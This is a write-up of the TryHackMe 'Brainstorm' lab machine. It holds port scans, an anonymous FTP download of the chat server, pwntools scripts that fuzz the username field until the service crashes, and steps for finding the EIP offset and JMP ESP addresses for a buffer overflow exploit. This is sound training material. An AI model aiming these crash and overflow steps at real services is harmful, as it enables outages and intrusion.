u915

Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Brainstorm

Writeup about the Tryhackme machine Brainstorm

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with nmap. This time I wasted time improving my nmap scans because they were really noisy and slow.

The scan is divided into 2 parts. First, a quick scan of all ports that only looks for open ports and dumps the results in grepable format to ports.txt:

nmap -p- --open -T5 -v 10.10😄 -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:00 CEST
Initiating Connect Scan at 20:00
Scanning 10.10😄 [65535 ports]
Discovered open port 3389/tcp on 10.10😄
Discovered open port 21/tcp on 10.10😄
Discovered open port 9999/tcp on 10.10😄
Connect Scan Timing: About 19.35% done; ETC: 20:03 (0:02:09 remaining)
Connect Scan Timing: About 64.45% done; ETC: 20:02 (0:00:34 remaining)
Completed Connect Scan at 20:02, 88.02s elapsed (65535 total ports)
Nmap scan report for 10.10😄
Host is up (0.037s latency).
Not shown: 65532 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
3389/tcp open  ms-wbt-server
9999/tcp open  abyss

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 88.15 seconds

To extract the port numbers I use grep -oP (Perl regex syntax), tr to strip the /open suffix, and xargs plus a second tr to join them into one comma-separated line (note that tr translates single characters, not strings, so the first tr only works here because the port numbers themselves contain no letters):

cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ','
21,3389,9999
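As an added example (not from the original writeup), a small parser for nmap's grepable (-oG) format that does the same job as the grep/tr/xargs pipeline without relying on the port list being digits only; the ports.txt content and the 10.10.0.1 address below are constructed samples:

```python
import re

# Constructed sample of ports.txt as written by -oG: one tab-separated
# record per host, with every port as port/state/proto/owner/service/rpc/version/
SAMPLE_OG = (
    "# Nmap 7.91 scan initiated Sat Jul  3 20:00:00 2021 as: nmap -p- --open -T5 -v 10.10.0.1 -n -Pn -oG ports.txt\n"
    "Host: 10.10.0.1 ()\tStatus: Up\n"
    "Host: 10.10.0.1 ()\tPorts: 21/open/tcp//ftp///, 3389/open/tcp//ms-wbt-server///, "
    "9999/open/tcp//abyss///\tIgnored State: filtered (65532)\n"
    "# Nmap done at Sat Jul  3 20:02:00 2021 -- 1 IP address (1 host up) scanned in 88.15 seconds\n"
)

# The seven slash-separated fields of one port entry in -oG output
PORT_RE = re.compile(r"(\d{1,5})/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_grepable(text):
    """Map host -> list of (port, state, proto, service, version) from -oG text."""
    result = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if field.startswith("Ports:"):
                for m in PORT_RE.finditer(field):
                    port, state, proto, _owner, service, _rpc, version = m.groups()
                    result.setdefault(host, []).append(
                        (int(port), state, proto, service, version))
    return result


def open_ports(text, proto="tcp"):
    """Sorted open port numbers over all hosts, filtered by protocol."""
    ports = set()
    for entries in parse_grepable(text).values():
        for port, state, prot, _svc, _ver in entries:
            if state == "open" and prot == proto:
                ports.add(port)
    return sorted(ports)


def port_arg(text):
    """The value to pass to nmap -p, e.g. '21,3389,9999'."""
    return ",".join(str(p) for p in open_ports(text))


if __name__ == "__main__":
    print(port_arg(SAMPLE_OG))   # 21,3389,9999
```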

Then a deeper scan on just those ports, building the port list inline from ports.txt:

nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ',')  10.10😄 -oN full_scan2.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:45 CEST
Nmap scan report for 10.10😄
Host is up (0.037s latency).

PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|_  SYST: Windows_NT
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2021-07-02T17:09:32
|_Not valid after:  2022-01-01T17:09:32
|_ssl-date: 2021-07-03T18:47:40+00:00; -37s from scanner time.
9999/tcp open  abyss?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     Welcome to Brainstorm chat (beta)
|     Please enter your username (max 20 characters): Write a message:
|   NULL: 
|     Welcome to Brainstorm chat (beta)
|_    Please enter your username (max 20 characters):
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -37s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.20 seconds

We can see 2 interesting things: first, there is an FTP server with anonymous login allowed, and second, a strange service on port 9999 that looks like a chat.

Anyway, I downloaded the files from the FTP server using the anonymous login:

ftp 10.10😄
Connected to 10.10😄.
220 Microsoft FTP Service
Name (10.10😄:u915): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19  08:36PM       <DIR>          chatserver
226 Transfer complete.
ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19  10:26PM                43747 chatserver.exe
08-29-19  10:27PM                30761 essfunc.dll
226 Transfer complete.

Downloading the files

ftp> get chatserver.exe
local: chatserver.exe remote: chatserver.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
43747 bytes received in 0.35 secs (122.8856 kB/s)
ftp> get essfunc.dll
local: essfunc.dll remote: essfunc.dll
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 32 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
30761 bytes received in 0.15 secs (194.3710 kB/s)

Note: I did this wrong: I realized later that I had downloaded the files in text mode (ASCII mode) and not in binary mode… I came back to this after getting stuck for a while because I could not run the .exe file.

Before downloading the files, set the transfer type to binary:

ftp> bin
200 Type set to I.

At this point it is clear that these are probably the same executables running on port 9999, so we can debug and study them locally to try to exploit the chat service.

Let's interact with the chat service:

nc 10.10😄 9999
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): u915
Write a message: ok


Sat Jul 03 12:02:11 2021
u915 said: ok

It looks like there are 2 input “strings” we can test for the vulnerability: the username and the message.

Note: Warning, for some reason the valid answer to the question (How many ports are open?) is not 3. I “bruteforced” the answer and the valid answer is 6; don’t ask me why, because I tested a lot of scans and I always get the same open ports.

2 - Vulnerability Identification

Studying in detail the .exe file and the DLL obtained from the FTP server on another Windows machine.

I used the same Windows 7 TryHackMe machine as for the stack buffer overflow preparation, connecting over RDP:

xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea

I wrote a custom Python script to fuzz the username; after a bit of tuning the script looks like this:

#!/usr/bin/env python3
# Fuzz the username prompt with growing runs of "A" (500 more each round)
# until the chat stops answering, which means the service crashed.

from pwn import *

HOST = "10.10😄"
PORT = 9999
LIMIT = 60
CHARS_FUZZ = 500

for x in range(1, LIMIT):
    r = remote(HOST, PORT)
    print(r.recvline(timeout=1))   # banner
    print(r.recvline(timeout=1))   # username prompt has no newline, so usually b''
    print("[+] SENDING USERNAME"+str(CHARS_FUZZ*x)+" CHARS, COUNTER:"+str(x))
    r.send(b"A" * CHARS_FUZZ * x + b"\r\n")   # send bytes, not str, on Python 3
    r.clean()
    print("[+] SENDING CHAT")
    r.send(b"Ok\r\n")
    print(r.recvline(timeout=1))
    print(r.recvline(timeout=1))
    print(r.recvline(timeout=1))
    # No reply within 4 seconds: the server died on this length
    if r.recvline(timeout=4) == b'':
        print("[!] KO CHAT")
        r.close()
        break
    r.clean()
    r.close()

Started fuzzing in chunks of 500 chars:

python3 fuzz1.py
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME500 CHARS, COUNTER:1
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:07 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1000 CHARS, COUNTER:2
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:09 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1500 CHARS, COUNTER:3
[+] SENDING CHAT
b'Write a message: \n'
b'\n'
b'Sat Jul 03 16:13:10 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2000 CHARS, COUNTER:4
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:11 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2500 CHARS, COUNTER:5
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:13 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3000 CHARS, COUNTER:6
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:14 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3500 CHARS, COUNTER:7
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:15 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4000 CHARS, COUNTER:8
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:17 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4500 CHARS, COUNTER:9
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:18 2021\n'
[*] Closed connection to 10.10😄 port 9999
[+] Opening connection to 10.10😄 on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME5000 CHARS, COUNTER:10
[+] SENDING CHAT
b''
b''
b''
[!] KO CHAT
[*] Closed connection to 10.10😄 port 9999

The server crashes between 4500 and 5000 chars.

So the server is vulnerable to a buffer overflow attack. At least we can shut down the service 😎

3 - Exploit development

Start by creating a pattern of 5000 chars:

msf-pattern_create -l 5000

Using the pattern in another version of the previous Python script to trigger the buffer overflow, this time with Immunity Debugger attached to the .exe to study the crash:

#!/usr/bin/env python3
# Send the 5000-char msf pattern as the username so the bytes that end up
# in EIP reveal the offset (Immunity Debugger attached to chatserver.exe).

from pwn import *

HOST = "10.10😄"
PORT = 9999

# Output of msf-pattern_create -l 5000, split per leading letter to keep the
# literal readable; Python concatenates the adjacent bytes literals.
payload = (
    b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
    b"Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9"
    b"Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9"
    b"Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9"
    b"Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9"
    b"Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9"
    b"Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"
)

r = remote(HOST, PORT)
print(r.recvline(timeout=1))   # banner
print(r.recvline(timeout=1))   # username prompt
print("[+] SENDING USERNAME")
r.send(payload + b"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b'':
    print("[!] KO CHAT")   # no reply: the server crashed, check EIP in the debugger
r.close()

The server crashes as expected with the EIP value 46307746. At this point I discovered that I did not need to write this script because I could have sent the pattern with nc, but this is what I did.

Anyway, looking up that EIP value with msf-pattern_offset shows that the exact match is at 4560 chars:

msf-pattern_offset -l 5000 -q 46307746
[*] Exact match at offset 4560
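As an added example (not from the original writeup), the same lookup in plain Python: it rebuilds the msf pattern and searches it for the bytes that landed in EIP, which shows why the value seen in the debugger has to be reversed (little endian) before searching; the same packing produces the return address bytes used later in the exploit:

```python
import string
import struct


def msf_pattern(length):
    """Rebuild the msf-pattern_create output: triples of upper letter,
    lower letter and digit, cycled in that order and cut to the requested
    length (one full cycle is 26*26*10*3 = 20280 bytes)."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if 3 * len(triples) >= length:
                    return "".join(triples)[:length].encode()
    raise ValueError("length exceeds one pattern cycle")


def eip_to_buffer_bytes(eip_hex):
    """The debugger shows EIP as a number (e.g. 46307746). x86 loaded it
    little endian, so in the buffer the bytes sit in reverse order:
    46 77 30 46 -> b'Fw0F'."""
    return struct.pack("<I", int(eip_hex, 16))


def pattern_offset(eip_hex, length=5000):
    """What msf-pattern_offset -q does: find the EIP bytes in the pattern.
    Returns the offset, or -1 if the value did not come from the pattern
    (for example 42424242 from the 'BBBB' check)."""
    pat = msf_pattern(length)
    idx = pat.find(eip_to_buffer_bytes(eip_hex))
    if idx == -1:
        # msf also tries the bytes in the opposite order (big endian)
        idx = pat.find(struct.pack(">I", int(eip_hex, 16)))
    return idx


def return_address(addr):
    """Pack a return address for the payload: 0x62501533 -> \\x33\\x15\\x50\\x62."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    print(eip_to_buffer_bytes("46307746"))   # b'Fw0F'
    print(pattern_offset("46307746"))        # 4560
    print(return_address(0x62501533))        # b'3\x15Pb'
```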

The script evolved to take into account that the offset is covered with 4560 chars of padding followed by “BBBB” (42424242 in ASCII hex):

#!/usr/bin/env python3
# Check the offset: 4560 bytes of padding and then "BBBB", which should
# show up in EIP as 42424242.

from pwn import *

HOST = "10.10😄"
PORT = 9999
offset = 4560
fuzz = b"A" * offset

r = remote(HOST, PORT)
print(r.recvline(timeout=1))   # banner
print(r.recvline(timeout=1))   # username prompt
print("[+] SENDING USERNAME")
r.send(fuzz + b"BBBB" + b"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b'':
    print("[!] KO CHAT")   # no reply: the server crashed, check EIP in the debugger
r.close()

EIP is overwritten with 42424242, so I am on the right track.

Now I need the opcodes of a JMP ESP instruction:

/usr/bin/msf-nasm_shell 
nasm > jmp esp
00000000  FFE4              jmp esp

Using mona inside Immunity Debugger to find a memory address containing that JMP ESP instruction (FF E4):

First set the mona working directory; with %p it will be C:\Users\admin\Desktop\chatserver in my case:

!mona config -set workingfolder C:\Users\admin\Desktop\%p
!mona modules
!mona find -s "\xff\xe4"

Inside the generated file find.txt (in C:\Users\admin\Desktop\chatserver) you can find addresses in a module without protections (ASLR, Rebase and SafeSEH all False), like 0x62501533:

0x625014df : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014eb : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014f7 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501503 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250150f : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250151b : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
